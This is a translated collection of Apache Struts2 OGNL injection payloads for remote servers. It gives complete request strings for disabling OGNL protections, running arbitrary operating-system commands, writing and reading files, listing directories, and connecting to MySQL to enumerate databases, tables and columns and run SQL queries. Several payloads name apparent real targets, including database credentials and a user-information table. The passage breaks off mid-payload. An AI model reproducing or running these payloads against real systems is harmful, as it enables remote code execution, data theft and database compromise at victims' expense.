This is the 2010 version; for other versions, adapt it from this base. More tips are welcome.

Web root physical path:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

java.version:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.name:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.arch:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.version:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

user.name:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

user.home:

Web root physical path:

java.home: \43req.getRealPath(%22\u005c%22)

java.version: @java.lang.System@getProperty(%22java.version%22)

os.name: @java.lang.System@getProperty(%22os.name%22)

os.arch: @java.lang.System@getProperty(%22os.arch%22)

os.version: @java.lang.System@getProperty(%22os.version%22)

user.name: @java.lang.System@getProperty(%22user.name%22)

user.home: /usr/share/jbossas

user.dir: /var/lib/jbossas/bin

java.class.version: 49.0

java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar

java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64

file.separator: /

path.separator: :

java.vendor: Sun Microsystems Inc.

java.vendor.url: http://java.sun.com/

java.vm.specification.version: 1.0

java.vm.specification.vendor: Sun Microsystems Inc.

java.vm.specification.name: Java Virtual Machine Specification

java.vm.version: 1.5.0_13-b05

java.vm.vendor: Sun Microsystems Inc.

java.vm.name: Java HotSpot(TM) 64-Bit Server VM

java.specification.version: 1.5

java.specification.vendor:

java.specification.name: Java Platform API Specification

java.io.tmpdir: /tmp

Command execution

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls+-la

http://www.quam.net/index.action?request_locale=zh_TW&

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt

File upload request

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

POST

t=neirong&path=%2Ftmp%2Fhsmw.txt

For the modified POST version, just prepend an &.

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

&t=neirong&path=%2Ftmp%2Fhsmw.txt

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

&t=neirong&path=/tmp/hsmw.txt

Directory listing

Readability check (returns true): @java.io.File@listRoots()[0].isDirectory()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))

Number of roots: @java.io.File@listRoots().length

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))

First root: @java.io.File@listRoots()[0]

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('\43xman.getWriter().close()')(d))

Number of entries in it: @java.io.File@listRoots()[0].listFiles().length

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))

First entry: @java.io.File@listRoots()[0].listFiles()[0].getName()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))

Second entry: @java.io.File@listRoots()[0].listFiles()[1].getName()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))

How to tell it is a file (returns false): @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))

File size: @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('\43xman.getWriter().close()')(d))

Output file contents

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))

— Database operations —

rs.absolute(1) is the 1st database

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) is the 2nd database

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

And so on; stop when the returned value is empty. Database connection format, for comparison:

&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

&psw=<password>&user=<account>&clazz=<driver class>&url=<database URL (mind the URL encoding)>

------

Database (table listing): the original statement gains an extra &db=<database name>

rs.absolute(1) is the 1st table

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) is the 2nd table

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

------

Database (column listing): the original statement gains an extra &table=<table name>

rs.absolute(1) is the 1st column

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(1)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) is the 2nd column

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(2)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

-----

Database (executing SQL): the original statement gains an extra &sql=select+count%28*%29+from+userinfos

Note: the data here goes via GET; POST does not work, oddly.

Count the query's columns (example 1)

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

Count the query's columns (example 2): returns 8, i.e. 8 columns

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

Once 8 is confirmed, use rs.getMetaData().getColumnName(1), then rs.getMetaData().getColumnName(2), and so on through the 8 columns.

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

Output rows with rs.next(); the first row is a single rs.next()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b